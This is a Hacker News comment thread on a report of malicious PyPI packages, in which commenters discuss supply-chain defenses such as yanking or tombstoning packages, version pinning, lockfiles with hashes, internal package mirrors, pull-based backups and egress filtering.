Malicious PyPI packages stealing credit cards and injecting code (jfrog.com)
489 points by hpb42 on Aug 3, 2021 | 226 comments



I don't think that it's good to just delete the packages. Same goes for Android Apps in the Google Play Store or for Chrome Extensions.

These compromised packages should have their page set to a read-only mode with downloads/installs disabled, with a big warning that they were compromised.

This is especially troublesome with Chrome Extensions and Android apps, where it is not possible to find out whether I actually had the extension installed and, if I did, what exactly it did.

Chrome Extensions getting automatically removed from the browser, instead of being permanently deactivated with a note explaining why they can't be activated again and what the reason for the removal was, is a problem for me. How do I know whether I had a bad extension installed, or whether personal data has been leaked?

This also applies to PyPI to some degree.

----

Eventually the downloads should get replaced with a module which, when loaded, prints a well-defined warning message and calls sys.exit() with a return code designated as a "vulnerability exception", which a build system can then handle.
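As a rough sketch, the replacement "tombstone" module could be as small as this (the exit code 99 and the wording are placeholders, not an established convention):

```
# Hypothetical module published in place of a removed malicious package.
# Exit code 99 stands in for an agreed-upon "vulnerability exception" code
# that build systems could check for and handle.
import sys

print(
    "SECURITY: this package was removed from PyPI because it was found to be "
    "malicious. See the project's page on PyPI for the advisory.",
    file=sys.stderr,
)
sys.exit(99)
```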


There is the "Yank" PEP 592 semantic that can be used to mark vulnerable packages. Its adoption has been a little slow, but I agree, having these packages available and marked accordingly makes it easier for security scanning and future detection research.

https://www.python.org/dev/peps/pep-0592/


Even better would be to allow their install, but have them start up with an immediate panic() sort of function (e.g., print("This package has been found to be malicious; please see pypi/evilpackagename for details"); sys.exit(99)) to force aborts of any app using those packages.


python packages run arbitrary code at install/build time, so this isn't viable.


It's no longer arbitrary if the PyPI crew is the one who controls the code, or did I understand you wrong?


Just that it isn't as simple as adding the lines to the code that gets executed. I think I misunderstood you: instead of prepending the code, you are suggesting the entire compromised package get replaced with `throw "You got Hacked"` at import time.


Correct: when the program starts to run and imports the modules, since nothing will make admins more aware that something is really wrong here. Maybe raise an exception which, if not handled, executes sys.exit() with a predefined code.

And some mechanism to detect this at install/build time as well, so that automated build systems can cleanly abort a build and issue a specific message, which can then be forwarded via email or SMS through some custom code.

The entire package gets replaced by a standardized, friendly one. No harmful code gets downloaded.


Denial of Service by panicking is also harmful for some processes.


It's not like an already running process will be affected by this.

This would only occur when the package gets updated or reinstalled, which shouldn't happen without supervision if the program is running in a sensitive context.

Otherwise a denial of service is a good last-resort measure in order to prevent running a malicious service. Ideally this gets detected at install/build time.


.whl packages don't run arbitrary code, they're just zips.


Skimming through that link, it seems that `yank` is for pulling _broken_ packages, whereas the suggestion above is to explicitly mark them as malicious.


Should we call the "mark them malicious" version "Yeet" or "Yoink"?


Good point. The keyword for uninstalling and removing residual files should indeed be Yeet.

Downloading the latest, bleeding edge version should be Yoked

pip install yoked <package>


`npm yeet malicious-package`


This is why our build systems don’t use public repositories directly, and why we always pin to an exact version. Any third party dependencies (js/python/java/c/you-name-it) are manually uploaded to our Artifactory server, which itself has no internet access. All third party libraries are periodically checked for new versions, any security announcements etc, and only if we are happy do we update the internal repo.

It has been a bit of a challenge, especially with js & node and quite literally thousands of dependencies for a single library we want to use. In such cases we try to avoid the library or look for a static/prepackaged version, but even then I don’t feel particularly comfortable.

I should really start specifying checksums too.
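For pip, that would look roughly like the snippet below in requirements.txt (the pin and the hash are placeholder values; real ones can be generated with `pip hash` or pip-tools' `pip-compile --generate-hashes`). Once any hash is present, pip turns on hash-checking mode for that install:

```
# placeholder hash shown; pip will refuse to install anything that doesn't match
requests==2.26.0 \
    --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
```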


Hosting your own repository, pinning, and checksum checks are defenses against network-based attacks and compromise of the package repository.

They do nothing against trojans like these. You will be running your own pinned checksummed version of the malicious code.

If you want to stop malware published by the legitimate package author, you need to review the code you're pulling in and/or tightly sandbox it (and effective sandboxing is usually impossible for dependencies running in your own process).


Well, it does introduce a time delay between the upstream release of a compromised package and when it enters your own codebase. As long as the exploit is found and published before someone manually uploads the package to the local store, you're safe.

But yes, a better option would be to run your own acceptance tests on each new upstream release, and that includes profiling disk/network/cpu usage across different releases.


Also introduces that same time delay for getting security patches released by package maintainers into your build pipeline.


This... worked in an org, where it literally took nearly 3 months to get package updates and additions approved... and that was for licensing review, not even proper security audits.

It may be safer to just accept that you live in the wild west and have systems boundaries in place to limit exposure/impact.

I've been pushing for closed-box logging targets, for example, where all logging goes to at least two systems (local and remote) so that the logging target is generally only available to submit log entries to. Not perfect, but where my head has been at.

Another thing is to PULL backups, not push them out.


> Another thing is to PULL backups, not push them out.

That's an absolute must. A push backup may not be a backup at all when you need it, or it may be compromised. It also requires the system you push into to be accessible for inbound connections, which in itself may be problematic.


Really, once the secure channel between two processes running on each host is set up, there is no difference between the two methods. A pull backup can be tricked just as easily by presenting a false filesystem or backdooring the 'pull process' running on the compromised machine.

You want append-only backups with secure timestamps, and to do forensics to find the last good snapshot. It is easier to set that up with pull backups, but not so hard with the right tools for push backups.


Another option is to use a cloud storage service that supports fine grained access control (e.g. write-only vs read-only) and retention policies.


Re: backups

Yes, yes, yes!

Not only that, but test your backups! And follow the 3-2-1 rule for any data of any importance: 3 copies in at least 2 different formats and 1 copy located off-site and in a different physical location from the other 2. Be sure to check the integrity of your backups, as well. It doesn't do much good to restore from a corrupted backup.

That all sounds like a lot of work, and an excess of paranoia, but you won't be thinking that when it comes time to restore from those backups. Let's see: pay millions of dollars in ransom anonymously in BTC to hackers who've held your data (and your company!) hostage, or, spend anywhere from a couple of hours to a few days restoring from backups.

It's your call, but, I know which one I would choose if I were the one who gets paged for things like that.


I'm trying to wrap my head around the concept of 'pulling' backups, rather than pushing them. In my mind, once you make a backup, you should then transfer it to a separate system for archival.

Where am I going wrong?


To pull backups, the backup system connects to the production system and grabs the data, storing it locally on the backup system. To push backups would be for the production system to connect to the backup system and send the data.

The main benefit of pull-based backups is that the production machine doesn't need credentials to write to the backup server; this means if production is compromised, it can't corrupt your backups.
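A rough sketch of the pull direction (hostnames, paths, and the read-only SSH user are made up; assumes rsync over SSH is available):

```
# Runs on the backup server, never on production. Production holds no
# credentials for the backup host, so compromising production doesn't
# grant write access to existing backups.
import datetime
import subprocess

snapshot_dir = f"/backups/prod/{datetime.date.today().isoformat()}/"

subprocess.run(
    [
        "rsync", "-a",
        "backup-reader@prod.example.com:/var/lib/app/data/",
        snapshot_dir,
    ],
    check=True,
)
```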


If you can’t trust the production machine to initiate regular backups by itself, why do you trust the production machine to allow the backup server to access the production machine and make backups? In both cases you need an alert system to detect if a production system has not been backed up for too long.

Therefore, a push system is no different than a pull system, provided, of course, that the production system can only make new backups, not write indiscriminately to the backup server (e.g. delete old backups).


> If you can’t trust the production machine to initiate regular backups by itself, why do you trust the production machine to allow access by the backup server?

If production is compromised, you can't trust either.

> Therefore, a push system is no different than a pull system

Not entirely - a push system can DoS the backups much more easily than a pull system (by filling the disks, say), and a push system requires append-only backups in order to protect against backup corruption. A pull system just requires read-only access into production, which is much simpler to configure, audit, enforce, and maintain (IMO).


Not true. We assess each update in case there are high-priority issues that need a quick update.

Also, we are cautious about using dependencies that don’t provide long-term support/backported fixes - where possible I pick stable, responsibly managed dependencies. Postgres is a great example: security fixes are applied across multiple major versions, not just the latest.


Sounds exactly like what we do for medical device software.

Version pinning, self-managed forks and code reviews of the dependency on upgrade.


How do you get informed about whether a high-priority issue exists?

In particular, who is auditing the old version of the code that you happen to be running to make sure it doesn't have vulnerabilities that are now gone after a non-security-motivated change like a refactoring or a feature removal? Probably not the upstream maintainers, who generally only maintain HEAD.


Security mailing lists. GitHub has security alerts. Good old-fashioned RSS. For example, rubygems.org supports RSS for releases. GitHub Release pages also support RSS. An easy way to share RSS feeds is to create a #news channel in Slack that has all the feeds.

It can be a pain but that pain might be motivation to not pull in dependencies with little thought.


Again, how does any of that tell you whether a high-priority issue exists in the old version of the code that you're running, as opposed to in the latest release?


I understand your point. I'd expect the old version to have been reviewed when it was introduced into the system just as the new version should be. Of course, that doesn't guarantee something won't slip in.

Running private package infrastructure with audited dependencies isn't a panacea to stopping supply chain attacks. I do believe it's an effective defense-in-depth tactic for the reasons others have discussed.

An additional supporting tactic that should be done is to tightly control egress traffic. Like ingress traffic, all egress traffic should be denied by default. From there, traffic should be whitelisted. That makes it more difficult to exfiltrate data or communicate with command and control infrastructure. Tight control on egress traffic also makes it easier to alert on unexpected connection attempts. That all said, locking down egress traffic can be a pain. It also isn't a panacea. Where there’s a will there’s a way.


And you should run an antivirus on the repository machine. It will be really slow, but will eventually catch these malicious libs.


You will never eliminate the threat entirely, pinning and not using obscure projects does however cut down on the probability and you can't deny that.


Depending what you mean by "review," then I agree with you.

If you mean having humans inspect every line of code of every package, well... good luck with that. But, if you're talking about automated analysis and acceptance testing, then, I think you've got something.

Like unit testing, automated testing and analysis is never going to catch 100% of all issues, but it can definitely help your SRE team sleep at night.


It does protect against typo'd dependencies. So if there were an evil package called requestss, you wouldn't be able to install it by accident.


I did a bunch of nodejs stuff at my last gig. These teams had the practice of keeping packages up to date. Drove me frikkin nuts. So much churn, chaos.

Is this a JavaScript thing? Carried over from frontend development?

Exasperated, I finally stopped advocating for locking everything down. Everyone treated me like I was crazy. (Reproducible builds?? Pfft!!)

Happens with enterprisey Java, Spring, Maven projects too. (I can't even comment on Python projects; I was just happy when I could get them to run.)

What's going on? FOMO?

Lock ~~Look~~ down dependencies. Only upgrade when absolutely necessary. Keep things simple to facilitate catching regression bugs and such.

Oh well. I moved on. I don't miss it one bit.


Everyone I know uses some form of lock file, and most of the modern programming languages support it.

As for upgrading only when absolutely necessary, let's be honest, nothing is absolutely necessary. If the software is old, or slow, or buggy, well dear users you'll just have to deal with it.

In my experience however, it's easier to keep dependencies relatively up to date all the time, and do the occasional change that goes along with each upgrade, than waiting five years until it's absolutely necessary, at which point upgrading will be a nightmare.

I'd much rather spend 10 minutes each week reading through the short changelogs of 5 dependencies to check that, yes, the changes are simple enough that they can be merged without fear, and with the confidence that they're compatible with all the other up-to-date dependencies.


Both extremes are bad. If you never change anything, you are left behind on a lot of security updates and bug fixes. The longer you wait the harder it is to move.

The “stay current” model comes with risks too. It’s just a matter of figuring out which approach has the better value-to-risk trade-off, and how to mitigate the risks.


One company I worked for had a bot that would periodically go and try to upgrade each individual app dependency, then see if everything built and passed tests.

If it got a green build, it would make a PR with the upgrades, which you could then either choose to merge, or tell the bot to STFU about that dependency (or optionally, STFU until $SOME_NEWER_VERSION or higher is available, or there's a security issue with the current version).

If not, it would send a complain-y email to the dev team about it, which we could either silence or address by manually doing the upgrade.

This worked out rather well for us. I think the net effect of having the bot was to make sure we devs actually paid attention to what versions of our dependencies we were using.


The solution was, and always has been, to have someone review every commit to the libraries that your app uses, and raise red flags for security vulnerabilities and breaking changes that affect your application.

Oh, boy, I would love to work for a company that has someone like that. Know of any? At the least, I would love for a company to just give me time to review library changes with any sort of detail.


> It’s just a matter of figuring out which approach has the better value-to-risk trade-off

This is also bad.

If you want to have both stability/reliability and also receive security updates you need somebody to track security issues and selectively backport patches.

This is what some Linux distributions do: mainly Debian, Ubuntu, paid versions of SuSE and Red Hat, and so on.


The sweet spot would be using a lock file for reproducible builds, plus scheduled dependency upgrades. Before the dependency upgrade you can check whether the new version breaks something and plan for it.

I've used this in Python, where I try to keep dependencies to a minimum. I don't know if that would work in JavaScript, the dependency tree is huge there.


How do you deal with regressions?

For example, we once upgraded the redis client. One brief revision of the parser submodule had an apparent resource leak (I can't imagine how...), causing all of our services to ABEND after a few hours.

Because everything is updated aggressively, and there's so many dependencies, we couldn't easily back out changes.

--

FWIW, Gilt's "Test Into Production" strategy is the first and only sane regime I've heard for "Agile". Potentially reasonable successor to the era when teams did actual QA & Test.

Sorry, I don't have a handy cite. I advocated for Test Into Prod. Alas, we didn't get very far before our ant farm got another good shake.


When I see a regression, I look at what was recently updated (in the past hours, days), and it's usually one of those packages. Because frequent updates tend to be independent, it's usually not difficult to revert that change (eg. if I update react and lodash at the same time, chances are really good that I can revert one of those changes independently without any issues)


This is the way.

Also, you should try to update as few things as possible at once, and let your changes "soak" into production for a while before going in all "upgrade ALL the things!"

Why? Well, sometimes things that fail take a while to actually start showing you symptoms. Sometimes, the failure itself takes a while to propagate, simply due to the number of servers you have.

And, one of these days, cosmic rays, or some other random memory/disk error is going to flip a critical bit in some crucial file in that neato library you depend on. And, oh, the fouled up build is only going to go out to a subset of your machines.

You'll be glad you didn't "upgrade ALL the things!" when any of these things ends up happening to you.


Totally agree. That's why I'm asking if compulsively updating modules is a JavaScript, nodejs, whatever pathology.

This team pushed multiple changes to prod per day. And the load balancer with autoscaling is bouncing instances on its own. And, and, and...

So resource leaks were being masked. It was only noticed during a lull in work.

And then because so many releases had passed, delta debugging was a lot tougher. And then because nodejs & npm has a culture of one module per line of source (joking!), figuring out which module to blame took even more time.

I think continuous deploys are kinda cool. But not without a safety net of some sort.


I'm gonna toss this grenade out here, just because I don't see a better place to do it lol...

One of the companies I worked at had an incident a couple years before I started, where there were multiple malicious Python libraries being used in the code. For 3 months.

Luckily, the libraries didn't do anything significant except ping an IP address in China: they actually did perform their advertised functionality, didn't exfiltrate any data other than the source IP address on the ping packets, and were easy to replace once the situation was found out. But, for months, they had servers pinging or attempting to ping somewhere in China.

Oh, and those libraries made it into our internal repos we were using to pin versions with, too.

Beyond being a speecy spicy meatball of a story, the moral here is that you have to constantly be on your guard and verifying every single line of code that goes into your application somehow.


Also, you really ought to not allow egress from your servers except to your load balancer.

Just attempting should create alarms.


Correct. That's probably actually why it took so long to detect the malicious packages: when they got installed on machines running internal services, nothing much unexpected happened. Come to think of it, I actually don't remember how the packages were detected and identified to begin with.


In my experience although lock files are widely used in Node development, utilizing the lock files as part of a reproducible build system is far less prevalent in the wild. In fact, the majority of Node development I've seen eschews reproducible builds on the basis that things are moving too fast for that anyway, as if it were somehow a DRY violation, but for CICD. Would love to hear from Node shops that have established well followed reproducible CICD.


Good luck when your security department starts running XRay and demands all your dependencies are at the latest versions all the time because every second release of a package is reported as vulnerable.


Ya. That's a tough one. Philosophically, I totally support vetting. I don't know how we'd make it useful.

Pondering...

One past team had a weekly formal "log bash" ritual. I LOVED it.

That ops team kept track of everything. Any unexplained log entry had to be explained or eliminated. They kept track of explained entries on their end, so we wouldn't waste time rehashing stuff. I imagine their monitoring tools supported filters for squelching noisy explained log entries.

Maybe the security team which owns XRay could do something similar.


But.... We're right though? I mean there is some wiggle room, if some lib has a security hole in some functionality that's not actually being used, but it's all about risk. We gate deploys to prod over something like XRay or LifeCycle and the frustration it causes our devs is much cheaper than deploying something we know is insecure to prod and would cause us to fail an audit or something (let alone get pwned).


There was a recent discussion on HN about `npm audit` and its overwhelming number of false positive vulnerabilities [0]. I can see a policy like this being frustrating in the case of `npm dependencies`. Is this something you deal with?

[0] https://news.ycombinator.com/item?id=27761334


I mean you can have reproducible builds while being on the upgrade train. `package-lock.json` exists for a reason. And the tiny pains of upgrading packages over time mean you don't have to deal with gargantuan leaps when that one package has the thing you want and it requires updating 10 other packages because of dependencies.

Node is a special horror because of absolute garbage like babel splitting itself into 100s of plugins and slowly killing the earth through useless HTTP requests instead of just packaging a single thing (also Jon Schlinkert wanting to up his package download counts by making a billion useless micropackages). But hey, you're choosing to use those packages.

I think if you're using them, good to stay up to date. But you can always roll your own thing or just stay pinned. Just that stuff is still evolving in the JS world (since people still aren't super satisfied with the tooling). But more mature stuff is probably fine to stick to forever.


> Only upgrade when absolutely necessary.

Gotta disagree with this part. If you're making a web app, package updates really need to be done on a regular cadence, ideally every quarter, but twice a year at minimum IMO. In the .Net world at least it feels like most responsible open source maintainers make it relatively painless to upgrade between incremental major versions (e.g. v4 -> v5). If you put off upgrades until someone holds a gun to your head, so that your dependencies are years out of date, you're much more likely to experience painful upgrades that require a lot of work.


Backwards compatibility in the javascript world isn't great. If you stop updating for a couple of years, half your libraries have incompatible API changes. Then something like a node or UI framework update comes along and makes you update them all at once to work on the new version, and you're rewriting half your application just to move to a non-vulnerable version of your core dependency.


Java/Spring/Maven should have locked down dependencies by default. They have to go out of their way to not do that. Not that some people don't, anyway.

Typos:

> I stopped advocating for locking everything down.

started?

> Look down dependencies.

lock?


I think the first typo is actually correct. They're saying that they stopped advocating for it because everyone treated them like they were crazy for doing so.


AFAIK Maven and Gradle don't have any built-in way of locking down dependencies (direct or transitive), unless I missed something.


In my experience, Maven always uses the exact version specified in your pom.xml (and the pom.xml of your dependencies, transitively), it never uses a newer version automatically. That is, the built-in way in Maven is locked down dependencies.


Edited. Thanks for proofreading my rant. :)


I tend to assume OSS contributors/maintainers are generally working to make things better: features I'm not using/don't need aside, they're fixing bugs (that I might not know I'm hitting/about to hit), patching security holes, etc. - so that's one for the 'pro-upgrading' column.

Against that, sure, there might be something bad in the new release (maliciousness aside even, there might be a new bug!). But.. there might be in the old one I've pinned to as well? Assuming I'm not vetting everything (because how many places are, honestly) I have no reason to distrust the new version any more than my current one.

Reproducible builds are an orthogonal issue? You can still keep your dependencies' versions updated with fully reproducible builds. Ours aren't, but we do pin to specific versions (requirements.txt & yarn.lock), and keep the former up to date with pyup (creates and tests a branch with the latest version) and the latter up to date within semver minor versions just with yarn update (committed automatically since in theory it should be safe; we've had to revert only occasionally).


> keeping packages up to date.

It’s good security practice, especially for anything internet facing.

Sure, you don’t have to do it obsessively, but if you let it stagnate you can have trouble updating things when critical vulnerabilities are found, and you have a huge job because multiple APIs have changed along the way.


I get notifications every other week about my NodeJS packages having security vulnerabilities, and so I upgrade.

I'm not sure why NodeJS devs are so bad at security compared to say C++ devs. It's not like I'm getting asked to upgrade libstdc++ and eigen all the time ...


I’m not going to get into barriers for entry and what kind of developer chooses which language, but C/C++ has always eschewed having unnecessary dependencies (originally because dependency management is hard, but that’s no longer the real reason - it’s just become baked into the culture). Even if you copy and paste hundreds of lines of code (or individual source files) the way you think about and treat them is very different from when they are external to your code base. You own (your copy of) them now, and at the very least, you familiarize yourself with their internals (and you wouldn’t copy and paste something that had its own dependencies). Actual (dynamically linked) dependencies don’t export objects with super brittle interfaces so much as they do expose very stable, carefully designed, and as minimal as possible boundaries for interfacing with their internals. Anything crossing API boundaries is considered leaving/entering the trusted domain, and lifespans of pointers and references in a non-garbage collected language guide/force you to eschew incorporating external libraries into your code globally and isolate the interaction (and therefore, the attack surface area) between your code and external code.

Then there’s the type system. Despite having some of the weakest type systems of strongly typed languages, C (to some extent) and C++ (especially modern C++) are still light years ahead of what even TypeScript buys you because they don’t offer the same escape hatches or “fingers crossed this TS interface matches the JS object that we are binding it to, but two lines from here, no one will remember that this isn’t actually a native TS class and that this non-nullable field might actually be null because the compile-time type checking system can’t verify this even at runtime without manual user validation because the MS TS team refuses to transpile type validation because they insist on zero overhead even though JS is not a low level or systems language.”

More than anything else however, developers of statically typed languages tend to fundamentally disagree with the idea of “move fast and break often” and will put off changes for years if they’re not at least 90% sure it’s the correct solution (and even when they end up wrong, it’s still far better than someone that says “who cares if it’s the or even just an actually correct solution, it’s still a solution and we can always revisit this later”).


Feels like this is a business opportunity for someone.

Use case:

1. Upload a pre-reviewed package.json file.

2. The service monitors changes, and recommends updates. Recommendations might include security, bugs, features, etc. It would check downstream dependencies, too. For production systems, the team might only care about security fixes.

3. The developer team can review recommendations, and download the new package.json.

(There are lots of opportunities to improve this: direct integration with git, etc.)

Anybody know if this sort of service exists? I know npm has _some_ of this. Maybe I'm just ignorant of how much of a solved problem this is?


What you’re looking for is called SCA (software composition analysis).

Best tool I’ve used so far in this domain is snyk.


> Feels like this is a business opportunity for someone.

This is what some Linux distributions do. Quality review, legal review, security backports.


We use Renovate for this.


Node locks down dependencies for you: not only the version, but it saves a hash too. The problem is that npm install will install the newest version allowed in your config, and re-lock it. However, if you run npm ci, it will only install what is locked, and fail if the hashes don't match.

In Python, pipenv works the same way: pipenv sync will only install what is locked, and will check your hashes. I'm not sure about Poetry.


For quite a while now, the JS ecosystem has used lock files -- npm, yarn, pnpm. You have to go out of your way not to pin JS dependencies.


They have no concept of ever needing to reproduce a build. And they are probably right if you do continuous development of some SaaS stuff.


I’ve heard the argument that it’s not worth spending the time to get all aspects of your build environment into version control for 100% reproducible builds, but saying “I shouldn’t be bothered to know what my upstream deps are” is pretty sad (and hopefully rare).

Even with the continuous deploy stuff, I think you’re giving too much benefit of the doubt. If an upstream non-pinned change brings down something critical (e.g. payments), you’ll revert the change in source, rebuild, and release, and the site is still broken. If you keep old artifacts you can push one of those, but now you’re not really doing continuous deployment, and you won’t be again until you finish root cause analysis, and since you’ll never see the relevant change in your source code, it could take a while.


I agree. Locking things down is the way to go, when it comes to safety.

The downside, however, is that, by design, you end up with packages that don't get upgraded regularly. That can cause problems down the road when you decide you do want to upgrade those packages.

For instance, there might be breaking changes, because you're jumping major versions. Of course, breaking changes are always a problem, but, if you're not regularly upgrading stuff, your team will tend to build on/build around the functionality of the old version.

That leads to some real fun come upgrade time. If you're, say, 3 major versions behind the latest version, or whatever version contains some Cool New Feature(tm) you really, really need, you might end up having to do this silly dance of upgrading major versions one at a time, in order to keep the complexity of the upgrade process as a whole under control.

Oh, and, sometimes things get deprecated. That's always fun to deal with.

So, TL;DR: Yes, pin versions! It's safer that way! Just be aware that, like most engineering decisions, there's a tradeoff here that saves you some pain now in exchange for some amount of a different kind of pain in the future.


on the other hand, if you don't keep your packages up to date, you can get so behind that it is nearly impossible to upgrade.

especially bad if the older version you are on turns out to have vulns.

Josh Bloch says to update your packages frequently and I agree.


Sorry, I don't quite see how this would protect against supply chain attacks. If an upstream dependency is back-doored, they just have to silently add their code in an otherwise reasonable sounding release, and now you will happily download that version, add it to your internal mirrors, and pin its version forever. Unless you actually read the diff on every update, which I think is impractical (although you're welcome to correct me), I don't see how this is buying you much.


It’s not 100% bullet proof, but it’s safer than pulling any random repos directly from the internet.

It’s also good that your business doesn’t have to rely on a third party every time you need to pull down your dependencies and build your software.


Protects you against a dependency being hijacked and malware being retroactively embedded in prior versions. Checksumming would protect against that without the trouble of manually hosting the dependency.


I think part of the idea is that if you only use versions that have been released for a little while, you are hoping SOMEONE notices the malicious code before you finally update.

There are a number of issues with this approach, although the practice still might be a net benefit.

One, you are going to be behind on security patches. You have to figure out, are you more at risk from running unpatched code for longer, or from someone compromising an upstream package?

Two, if too many people use this approach, there won't be anyone who is actually looking at the code. Everyone assumes someone else would have looked, so no one looks.


My read was GP is implying they do read the diff every time, and only change the pinned version after a manual review- "only after we are happy."

This does seem impractical at even a modest scale.


What does "modest scale" mean? Some people have to have all dependency updates reviewed and have some level of independent security team monitoring dependency changes. Not everyone has this, but the context is key as some domains have this consistently.

Some of this is cultural in addition to being paranoid about security, or having strict compliance requirements. For your average startup, they may not have any time to dedicate to this and other fires, but that's not a universal situation.


> What does "modest scale" mean? Some people have to have all dependency updates reviewed and have some level of independent security team monitoring dependency changes.

Who? Seems totally intractable to me.


We periodically review all dependencies change logs, security advisories etc and update based on risk review. We also keep an eye out for critical vulnerabilities that need immediate patching. There are tools to help with this, plus communities like HN are relevant for breaking news.


Yes, this is why I implemented hash-checking in pip (https://pip.pypa.io/en/stable/topics/repeatable-installs/#ha...). Running your own server is certainly another way to solve the problem (and lets you work offline), but keeping the pinning info in version control gives you a built-in audit trail, code reviews, and one fewer server to maintain.


Doesn't Poetry do this by default in its lockfile too?


There is an active PEP[0] for defining lockfiles.

0: https://www.python.org/dev/peps/pep-0665/


This is how it always used to be, back in the before[1] times. Libraries would be selected carefully and dependencies would be kept locally so that you could always reproduce a build.

The world is different now, and just being able to select a package and integrate it like that is a massive effectiveness multiplier, but I think the industry at large lost something in the transition.

([1] before internet package management, and before even stuff like apt and yum)


The problem is that it also is a vulnerability multiplier.

People used to understand every package they installed. Now, they install dependencies of dependencies of dependencies, to the point that they have not even SEEN the name of most of their dependencies.

Install anything with maven and count the number of packages installed. It is appalling.


> I think the industry at large lost something in the transition.

Lost a lot of trust and security with the advent of language-specific installers that pull libraries and their dependencies from random URLs without any 3rd party vetting.


I agree, though I think there are a couple pieces to the puzzle. Like, quite apart from the enormous convenience of new releases being available right away, and even being able to drop in a git URL and run your dependency off a branch while you wait for your upstream PR to merge, pip provides isolation between workspaces that apt has never been able to do natively because it's too generic— the closest thing is lightweight unshares, but those were years after virtualenv, require more ceremony to get going with, and may be isolated from the outside system in ways that impede productivity (there's also never really been a consistent tooling story for it, with having to cobble together debootstrap + whatever the chroot flavor of the week is).

But the biggest issue is when npm, cargo, etc showed how to include a dependency multiple times at different versions. Operating system package managers (other than Nix & friends) have no concept for how this could or would work. Pip has no story for it, and the various pip-to-apt bridges like py2deb and stdeb if anything just exacerbate the problem, by mixing your project's dependencies with those on your system.

Anyway, yes. Things were lost, 100%. But I don't think the system you want (isolation, version freedom, but with safe/vetted packages) is going to be something that's possible to evolve out of any of the current systems. It's got to be something that goes back to first principles.


> pip provides isolation between workspaces that apt has never been able to do natively because it's too generic

This is hardly a concern on production systems. It's been common practice for decades to deploy each service on a dedicated host, or at least a VM in order to have a degree of security isolation. [or a container if you don't care]

> npm, cargo, etc showed how to include a dependency multiple times at different versions

And this is why they cannot provide stable releases and security backports.

If you want security updates you can use Debian or pay $$ for SuSE or Red Hat or $$$$ for custom support from some tech companies, but they will mostly support one version per package.

The combinatorics explosion of packages times versions on archives like npm or pypi makes it prohibitively expensive to reliably patch and test every combination of packages and versions.

Debian has been pioneering reproducible builds and automated installation CI/QA and it still took a lot of effort to get there.

> I don't think the system you want (isolation, version freedom, but with safe/vetted packages) is going to be something that's possible to evolve out of any of the current systems.

I don't want version freedom: it's not attainable. It's not a software problem, it's a math problem.

> It's got to be something that goes back to first principles.

Any idea?


If you don't want or need version freedom, what is it about the existing deb/rpm ecosystems that don't work for you, either on their own or in conjunction with the various tools that bridge other ecosystems into them? (I'm a fan of dh_virtualenv, myself)

Or is your lament that the world as a whole is worse off because others have eaten of the fruit of systems like npm and pip?


The latter, although it's not "the world as a whole", just some tech bubble. Various large companies prohibit pip/npm/docker.

(and here I'm even getting downvoted for going against the hivemind)

I can only hope that after enough software supply chain attacks the industry will realize that distros were right all along.


FYI - You can overwrite an existing package’s release/version via pip (at least when using Artifactory’s PyPi). Not safe to assume pinning the version ‘freezes’ anything.


Make a "lockfile" with the pip-compile tool [0] that includes hashes. Unless you happen to fetch the hash after the package has been compromised, this should keep you safe from an overwritten version.

[0]: https://pypi.org/project/pip-tools/


No, you cannot overwrite a file on PyPI once uploaded, even if you delete the release first. This policy has been in place for many years.


Pip also supports package hashes, so you can be sure you're getting the exact same package that you got last time.


Yep. You should also be hosting and deploying from wheels[0], even for stuff you create internally. If you're doing it right, you'll end up hosting your own internal PyPi server[1], which, luckily, isn't hard[2].

We did this at one of my previous companies, and, of all the things that ever went wrong with our deploy processes, our internal PyPi server was literally never the culprit.
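Pointing builds at a server like that is mostly a pip configuration matter. A minimal sketch, with the URL a placeholder for wherever your internal index lives:

```
# pip.conf (location varies by platform): route all installs through the internal index
[global]
index-url = https://pypi.internal.example.com/simple/
```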

---

[0]: https://pythonwheels.com/

[1]: https://github.com/testdrivenio/private-pypi

[2]: https://testdriven.io/blog/private-pypi/


I have been doing internal repositories and vendoring since 2000; only for personal projects do I do otherwise, as they are mostly throwaway stuff.

Teaching good security practices and application lifecycle management seems to always be an uphill battle.


Out of curiosity, is it really necessary to have the separate artifact server? Pinning dependencies by hash ought to be sufficient.


Seems reasonable enough depending on your use case.

In our situation we store our own (private, commercial) artifacts as well as third party ones, so we already need to have a server, and we know our server is configured, maintained & monitored in a secure fashion whereas I have no guarantees with public servers.

Plus our build servers don’t have access out to the internet either, for security. Supply chain attacks like SolarWinds and Kaseya are too common these days.

Edit: Also, our local servers are faster at serving requests, allowing for faster builds, and ensures no issues with broken builds if a public repo went offline or was under attack.


Security and availability don't have to be mutually exclusive. I remember in the early days of Go modules our Docker builds (that did "go mod download") would be rate-limited by Github, so a local cache was necessary to get builds to succeed 100% of the time. (Yes, you can plumb through some authentication material to avoid this, but Github is slow even when they're not rate limiting you!) Honestly, that thing was faster than the official Go Module Proxy so I kept it around longer than necessary and the results were good.

Even if you cache modules on your own infrastructure, you should still validate the checksums to prevent insiders from tampering with the cached modules.

I'll also mention that any speed increases really depend on your CI provider. I self-hosted Jenkins on a Rather Large AWS machine, and had the proxy nearby, so it was fast. But if you use a CI provider, they tend to be severely network-limited at the node level and so even if you have a cache nearby, you are still going to download at dialup speeds. (I use CircleCI now and at one point cached our node_modules. It was as slow as just getting them from NPM. And like, really slow... often 2 minutes to download, whereas on my consumer Internet connection it's on the order of 10 seconds. Shared resources... always a disaster.)


Tangential non sequitur:

> self-hosted on AWS

People forgot what self-hosting actually means.


I disagree with that analysis. That basically means running some binary yourself, with the alternative being buying a SaaS product that is hosted by the developer. You may think that "self-hosting" means having your own physical server, but I have never heard anyone else use the expression like that.


Meanings can evolve over time. I tend to think of self hosted as installing from code and managing myself, whether on local hardware or remote.


The OP wrote "self-hosted Jenkins", which has a different meaning


It's going to depend on your circumstances. You don't share any context about your app or any of your development. Rather than looking at this from the perspective of needing an artifact server, you just look at it as a case of supply chain protection.

If pinning dependencies counters all the threats in your threat model, then fine. If not, you need to be doing something to counter them. An artifact server, or vendoring your dependencies, provides a lot of additional control where chokepoints or additional audits can be inserted.

If there was no management cost or hassle then you'd just have an artifact server to give you a free abstraction, but it's a trade-off for many people. It's also not a solution in itself, you need to be able to do audits and use the artifact server to your advantage.

The problem is really with the threat models and whether someone really knows what they need to defend against. I find that many engineers are naïve to the threats since they've never personally had exposure to an environment where these are made visible and countered. At other times, engineers are aware, but it's a problem of influencing management.


It's nice to have a build machine that can complete a build when it's disconnected from the Internet


How often does that happen?



Docker Hub also has rate limits and outages, so yet another thing you want to cache if you promise customers "we'll install our software in your Kubernetes cluster in 15 minutes 99.95% of the time".


I don't see how any of those are build machines that are offline.


